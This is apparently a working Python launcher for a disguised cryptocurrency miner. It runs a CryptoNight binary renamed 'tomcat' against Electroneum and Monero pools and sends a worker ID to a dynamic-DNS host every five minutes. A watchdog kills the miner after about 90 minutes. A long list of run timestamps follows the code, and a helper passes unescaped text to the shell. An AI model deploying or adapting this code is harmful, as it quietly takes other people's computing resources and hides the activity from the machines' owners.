import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:07.332797
#2018-02-17 16:39:06.008279
#2018-02-17 18:27:04.982929
#2018-02-17 20:14:06.872902
#2018-02-17 22:02:06.050419
#2018-02-17 23:46:04.288825
#2018-02-18 01:35:05.895628
#2018-02-18 03:22:03.322220
#2018-02-18 05:09:07.185097
#2018-02-18 07:01:04.321051
#2018-02-18 08:48:05.722460
#2018-02-18 10:35:06.335503
#2018-02-18 12:20:01.472060
#2018-02-18 14:07:01.943531
#2018-02-18 15:57:06.244690
#2018-02-18 17:47:05.151873
#2018-02-18 19:33:08.775389
#2018-02-18 21:18:08.124167
#2018-02-18 23:06:04.113730
#2018-02-19 00:53:04.761906
#2018-02-19 02:40:01.404729
#2018-02-19 04:27:06.557651
#2018-02-19 06:14:03.783281
#2018-02-19 08:02:01.469535
#2018-02-19 09:52:06.283561
#2018-02-19 11:41:01.675725
#2018-02-19 13:27:05.440577
#2018-02-19 15:16:06.345896
#2018-02-19 17:04:06.855685
#2018-02-19 18:51:08.258845
#2018-02-19 20:40:09.736254
#2018-02-19 22:27:05.340912
#2018-02-20 00:13:01.504618
#2018-02-20 02:01:04.059893
#2018-02-20 03:51:06.738147
#2018-02-20 05:35:06.313707
#2018-02-20 07:19:07.214988
#2018-02-20 09:06:03.903941
#2018-02-20 10:49:08.347665
#2018-02-20 12:36:07.708554
#2018-02-20 14:22:08.421290
#2018-02-20 16:07:09.941672
#2018-02-20 17:52:07.339389
#2018-02-20 19:44:05.043926
#2018-02-20 21:33:05.636099
#2018-02-20 23:16:08.015747
#2018-02-21 01:02:06.035076
#2018-02-21 02:50:04.079908
#2018-02-21 04:39:05.160637
#2018-02-21 06:27:01.824452
#2018-02-21 08:12:04.342032
#2018-02-21 09:58:07.779894
#2018-02-21 11:45:01.834674
#2018-02-21 13:33:08.197063
#2018-02-21 15:18:01.269412
#2018-02-21 17:08:05.442845
#2018-02-21 18:56:02.059131
#2018-02-21 20:44:07.600130
#2018-02-21 22:30:08.764445
#2018-02-22 00:20:06.744620
#2018-02-22 02:08:03.288869
#2018-02-22 03:53:08.021275
#2018-02-22 05:41:05.827556
#2018-02-22 07:26:06.793953
#2018-02-22 09:14:06.955897
#2018-02-22 11:02:03.162826
#2018-02-22 12:48:05.081909
#2018-02-22 14:33:08.134877
#2018-02-22 16:19:04.080671
#2018-02-22 18:07:01.863711
#2018-02-22 19:55:07.956815
#2018-02-22 21:43:08.679856
#2018-02-22 23:31:07.210475
#2018-02-23 01:19:05.586371
#2018-02-23 03:05:06.819213
#2018-02-23 04:49:07.701715
#2018-02-23 06:35:03.787758
#2018-02-23 08:23:05.228720
#2018-02-23 10:39:06.611020
#2018-02-23 12:33:04.941222
#2018-02-23 14:19:08.466702
#2018-02-23 16:10:07.867721
#2018-02-23 17:55:09.088424
#2018-02-23 19:40:10.563318
#2018-02-23 21:23:01.547253
#2018-02-23 23:10:07.234205
#2018-02-24 00:53:06.559057
#2018-02-24 02:48:06.411414
#2018-02-24 05:29:05.232807
#2018-02-24 07:16:07.035828
#2018-02-24 09:05:04.258739
#2018-02-24 10:43:06.863050
#2018-02-24 12:27:06.739063
#2018-02-24 14:01:06.774535
#2018-02-24 15:37:04.062119
#2018-02-24 17:21:06.079789
#2018-02-24 18:55:05.157994
#2018-02-24 20:30:03.630240
#2018-02-24 22:02:05.050077
#2018-02-25 00:46:04.148104
#2018-02-25 02:44:03.764770
#2018-02-25 06:34:04.165344